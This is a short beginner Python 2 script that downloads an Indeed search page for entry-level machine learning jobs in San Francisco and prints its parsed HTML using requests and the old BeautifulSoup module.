import requests from BeautifulSoup import BeautifulSoup url = 'https://www.indeed.com/jobs?q=Entry-Level+Machine+Learning+&l=San+Francisco&radius=25' response = requests.get(url) html = response.content soup = BeautifulSoup(html) table = soup.find('tbody', attrs={'class': 'stripe'}) print soup.prettify()